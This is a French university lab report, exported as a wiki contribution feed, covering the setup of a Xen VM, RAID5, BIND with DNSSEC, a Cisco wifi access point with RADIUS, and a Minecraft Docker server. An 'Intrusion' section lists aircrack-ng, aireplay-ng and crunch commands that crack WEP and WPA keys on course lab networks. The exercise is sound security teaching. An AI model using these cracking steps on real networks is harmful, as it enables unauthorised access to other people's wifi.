<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="fr">
		<id>https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Amace</id>
		<title>Wiki d'activités IMA - Contributions de l’utilisateur [fr]</title>
		<link rel="self" type="application/atom+xml" href="https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Amace"/>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php/Sp%C3%A9cial:Contributions/Amace"/>
		<updated>2026-05-14T05:28:19Z</updated>
		<subtitle>Contributions de l’utilisateur</subtitle>
		<generator>MediaWiki 1.29.2</generator>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60453</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60453"/>
				<updated>2022-11-30T22:52:25Z</updated>
		
		<summary type="html">&lt;p&gt;Amace : /* Plan d’adressage */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Global scheme PRA 2020.png]]&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
 ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;br /&gt;
&lt;br /&gt;
==Sécurisation des données - RAID5==&lt;br /&gt;
&lt;br /&gt;
On sécurise nos données à l'aide de RAID5&lt;br /&gt;
&lt;br /&gt;
Installer les paquets nécessaires sur la VM et capbreton :&lt;br /&gt;
 apt install mdadm&lt;br /&gt;
&lt;br /&gt;
Créer les partitions virtuelles pour le RAID :&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-1 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-2 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-3 virtual&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-1,xvdd1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-2,xvdd2,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-3,xvdd3,w'&lt;br /&gt;
                ]&lt;br /&gt;
On redémarre la VM :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
Créer le RAID5 à l’aide de la commande mdadm :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdd1 /dev/xvdd2 /dev/xvdd3&lt;br /&gt;
Formater la partition RAID5 :&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
Ajout de la partition au fichier /etc/fstab :&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
On recharge les partitions afin de prendre en compte le RAID :&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
Vérification&lt;br /&gt;
&lt;br /&gt;
[[Fichier:RAID5_detestable.png]]&lt;br /&gt;
&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
===DNS===&lt;br /&gt;
Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt;.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter le Glue Record vers &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt; afin d’associer le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; à l’adresse IP &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier les serveurs de noms pour utiliser &amp;lt;code&amp;gt;ns.detestable.site&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ns6.gandi.net&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Installation du paquet &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install bind9&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.48&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;detestable.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;options{&lt;br /&gt;
  directory &amp;amp;quot;/var/cache/bind&amp;amp;quot;;&lt;br /&gt;
  dnssec-validation auto;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;amp;quot;allowed_to_transfer&amp;amp;quot;; };&lt;br /&gt;
};&lt;br /&gt;
acl &amp;amp;quot;allowed_to_transfer&amp;amp;quot; {&lt;br /&gt;
  193.48.57.0/24;&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Créer le fichier BIND pour &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cp /etc/bind/db.local /etc/bind/db.detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for detestable.site&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.detestable.site. root.detestable.site. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@   IN  NS  ns.detestable.site.&lt;br /&gt;
@   IN  NS  ns6.gandi.net.&lt;br /&gt;
@   IN  A   193.48.57.163&lt;br /&gt;
NS  IN  A   193.48.57.163&lt;br /&gt;
NS  IN  AAAA    2001:660:4401:60a0:216:3eff:fe82:3e78&lt;br /&gt;
WWW IN  CNAME   NS&lt;br /&gt;
SSH IN  CNAME   NS&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Redémarrage du service &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Tester DNS : ===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.163&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Vérification de la traduction du nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nslookup detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===DNSSEC===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-enable yes;&lt;br /&gt;
dnssec-validation yes;&lt;br /&gt;
dnssec-lookaside auto;&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Création du répertoire &amp;lt;code&amp;gt;detestable.site.dnssec&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;mkdir /etc/bind/detestable.site.dnssec/&lt;br /&gt;
cd /etc/bind/detestable.site.dnssec/&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Génération de la clef asymétrique de signature de clefs de zone :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-keygen -a RSASHA256 -b 2048 -f KSK -n ZONE detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;mv Kdetestable.site.*.key detestable.site-ksk.key&lt;br /&gt;
mv Kdetestable.site.*.private detestable.site-ksk.private&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Génération de la clef asymétrique de signature des enregistrements :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-keygen -a RSASHA256 -b 2048 -n ZONE detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;mv Kdetestable.site.*.key detestable.site-zsk.key&lt;br /&gt;
mv Kdetestable.site.*.private detestable.site-zsk.private&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;$include &amp;amp;quot;/etc/bind/detestable.site.dnssec/detestable.site-ksk.key&amp;amp;quot;&lt;br /&gt;
$include &amp;amp;quot;/etc/bind/detestable.site.dnssec/detestable.site-zsk.key&amp;amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Signature des enregistrements de la zone :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-signzone -o detestable.site -k detestable.site-ksk ../db.detestable.site detestable.site-zsk&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;demineur.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site.signed&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il ne reste plus qu’à communiquer la partie publique de la KSK (présente dans le fichier &amp;lt;code&amp;gt;detestable.site-ksk.key&amp;lt;/code&amp;gt;) à Gandi.&amp;lt;br /&amp;gt;&lt;br /&gt;
L’algorithme utilisé est le 8 (RSA/SHA-256).&lt;br /&gt;
&lt;br /&gt;
=== Tester DNSSEC : ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cd /etc/bind/&lt;br /&gt;
dnssec-verify -o detestable.site db.detestable.site.signed&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Vérifier son DNS avec dnsviz.net ===&lt;br /&gt;
[[Fichier:dnsviz_detestable.png]]&lt;br /&gt;
&lt;br /&gt;
=Connexion wifi=&lt;br /&gt;
==Point d'accès wifi==&lt;br /&gt;
Paramètres de minicom&lt;br /&gt;
 Serial Device : /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
Mode terminal&lt;br /&gt;
 ap&amp;amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
Configuration du nom d’hôte :&lt;br /&gt;
 &amp;lt;pre&amp;gt;ap(config)#hostname SE2A5-AP1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Accès SSH :&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
Accès console :&lt;br /&gt;
 SE2A5-AP1(config)#line console 0&lt;br /&gt;
 SE2A5-AP1(config-line)#password glopglop&lt;br /&gt;
 SE2A5-AP1(config-line)#login authentification default&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
Sécurisation des accès :&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
VLAN n°20&lt;br /&gt;
 &amp;lt;SE2A5-AP1(config)#aaa authentication login EAP_toto group RADIUS_toto&lt;br /&gt;
 SE2A5-AP1(config)#radius-server host 193.48.57.163 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 SE2A5-AP1(config)#aaa group server radius RADIUS_toto&lt;br /&gt;
 SE2A5-AP1(config-server)#server 193.48.57.163 auth-port 1812 acct-port 1813&lt;br /&gt;
 SE2A5-AP1(config-server)#exit&lt;br /&gt;
 SE2A5-AP1(config)#dot11 ssid SE2A5_1&lt;br /&gt;
 SE2A5-AP1(config-ssid)#vlan 20&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication open eap EAP_toto&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication network-eap EAP_toto&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication key-management wpa&lt;br /&gt;
 SE2A5-AP1(config-ssid)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface dot11radio0.20&lt;br /&gt;
 SE2A5-AP1(config-subif)#encapsulation dot1q 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#bridge-group 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface g0.20&lt;br /&gt;
 SE2A5-AP1(config-subif)#encapsulation dot1q 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#bridge-group 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface dot11radio 0&lt;br /&gt;
 SE2A5-AP2(config-if)#no shutdown&lt;br /&gt;
 SE2A5-AP1(config-if)#encryption vlan 20 mode ciphers aes-ccm tkip&lt;br /&gt;
 SE2A5-AP1(config-if)#mbssid&lt;br /&gt;
 SE2A5-AP1(config-if)#ssid SE2A5_1&lt;br /&gt;
 SE2A5-AP1(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Paramètres de minicom&lt;br /&gt;
 Serial Device : /dev/ttyACM0&lt;br /&gt;
VLAN n°1 :&lt;br /&gt;
 SE2A5-AP1(config)#interface BVI 1&lt;br /&gt;
 SE2A5-AP1(config-if)#ip address 10.0.0.10 255.255.255.0&lt;br /&gt;
 SE2A5-AP1(config-if)#no shutdown&lt;br /&gt;
 SE2A5-AP1(config-if)#exit&lt;br /&gt;
 SE2A5-AP1(config)#ip default-gateway 10.0.0.1&lt;br /&gt;
&lt;br /&gt;
== Configuration du serveur RADIUS ==&lt;br /&gt;
&lt;br /&gt;
Le serveur RADIUS permet l’authentification des utilisateurs qui se connectent aux points d’accès Wifi (WPA-EAP).&lt;br /&gt;
&lt;br /&gt;
* Installer le paquet &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install freeradius&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modifier le fichier &amp;lt;code&amp;gt;/etc/freeradius/clients.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;client SE2A51 {&lt;br /&gt;
        ipaddr  = 10.0.0.10&lt;br /&gt;
        secret  = glopglop&lt;br /&gt;
}&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajouter un utilisateur en modifiant le fichier &amp;lt;code&amp;gt;/etc/freeradius/3.0/users&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;pifou Cleartext-Password := &amp;amp;quot;pasglop&amp;amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modifier le fichier &amp;lt;code&amp;gt;/etc/freeradius/3.0/mods-enables/eap&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;eap {&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
  ...&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Arrêter le service &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; durant la phase de tests :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service freeradius stop&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Démarrer &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; en mode debug :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;freeradius -X&amp;lt;/pre&amp;gt;&lt;br /&gt;
Pendant que &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; est en mode debug, tenter de se connecter au réseau Wifi qui a été créé et vérifier que celle-ci est prise en compte.&amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:freeradius_X.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On peut également voir la connexion de l'appareil sur minicom&lt;br /&gt;
&lt;br /&gt;
[[Fichier:connexion_minicom.png]]&lt;br /&gt;
&lt;br /&gt;
Si la connexion est validée alors la configuration est correcte. Dans ce cas, arrêter le programme de debug et réactiver le service.&lt;br /&gt;
&lt;br /&gt;
* Redémarrer le service &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service freeradius start&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Intrusion =&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
&lt;br /&gt;
Pour casser une clé WEP il nous faut le logiciel Aircrack:&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abord se mettre sur la bonne interface ethernet:&lt;br /&gt;
 airmon-ng start wlan0mon&lt;br /&gt;
&lt;br /&gt;
On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)&lt;br /&gt;
&lt;br /&gt;
(Ne pas juger la qualité du photographe)&lt;br /&gt;
[[Fichier:WEP_Liste.jpg]]&lt;br /&gt;
&lt;br /&gt;
On s'identifie&lt;br /&gt;
 aireplay-ng -9 -e cracotte01 -a 04:DA:D2:9C:50:50 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous recuperons ensuite les VI que l'on stock dans un fichier qui nous permettera de casser la clé :&lt;br /&gt;
 airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous procédons maintenant a la fausse identification: &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte01 -a 04:DA:D2:9C:50:50 -h 40:A5:EF:01:21:80 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a lancer le crack de la clé &lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:50 output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Resultat: &lt;br /&gt;
&lt;br /&gt;
[[Fichier:cléWEP.jpeg]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
Nous allons utiliser le même logiciel que pour WEP (aircrack)&lt;br /&gt;
&lt;br /&gt;
Pour recuperer la clé WPA, il faut attendre un handshake de krakote01&lt;br /&gt;
 airodump-ng wlx40a5efd2140c --essid kracotte01 -c 4 -w /tmp/wpa&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake recuperer nous allons generer un dictionvaire de mot de passe (ici une combinaison de 8 chiffres)&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Il nous reste plus qu'a utiliser aircrack comme ceci&lt;br /&gt;
 aircrack-ng -w password.lst wpa02.cap&lt;br /&gt;
&lt;br /&gt;
Il faut desormais être patient et attendre 5h40 pour essayer tout le dictionnaire.&lt;br /&gt;
&lt;br /&gt;
Un essaie en subdivisant a été fait mais sans resultat dans le temp imparti&lt;br /&gt;
&lt;br /&gt;
Après 4 heures 1 minutes et 29 seconde nous avons la clé: &lt;br /&gt;
 66699666&lt;br /&gt;
&lt;br /&gt;
[[Fichier:WPA_crack.png]]&lt;br /&gt;
&lt;br /&gt;
=MINECRAFT=&lt;br /&gt;
&lt;br /&gt;
Nous allons installer un serveur minecraft sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour cela nous allons avoir besoin de DOCKER&lt;br /&gt;
 apt-get install docker&lt;br /&gt;
&lt;br /&gt;
Une fois l'installation faite nous devons prendre une image de serveur minecraft:&lt;br /&gt;
 docker run -d -it -p 25565:25565 -e EULA=TRUE itzg/minecraft-server&lt;br /&gt;
&lt;br /&gt;
Cette image vient du github: https://github.com/itzg/docker-minecraft-server&lt;br /&gt;
&lt;br /&gt;
Nous mettons le port 25565 car c'est le port utilisé par minecraft&lt;br /&gt;
&lt;br /&gt;
Une fois cela fait nous pouvons visualiser les docker activité&lt;br /&gt;
 docker ps &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:docker_minecraft.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Connexion==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter il suffit d'avoir un minecraft et de renseigner l'IP du serveur&lt;br /&gt;
&lt;br /&gt;
[[Fichier:minecraft_pc.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le problème avec ce serveur minecraft est sa gourmandise en memoire. En effet, celui-ci plante lorsqu'il y a trop de redstone sur le serveur ou qu'il y a une trop grosse explosion de TNT.&lt;br /&gt;
&lt;br /&gt;
Cela doit être dû (pour la TNT) a un trop gros changement de map et besoin d'affichage qui nécessite trop de mémoire vive.&lt;br /&gt;
&lt;br /&gt;
Pour la redstone, étant donné que nous avons essayé de recréer des portes logique, cela devait trop &amp;quot;consommer&amp;quot;&lt;/div&gt;</summary>
		<author><name>Amace</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60452</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60452"/>
				<updated>2022-11-30T22:52:06Z</updated>
		
		<summary type="html">&lt;p&gt;Amace : /* Plan d’adressage */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
[[Média:Global scheme PRA 2020.png]]&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
 ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
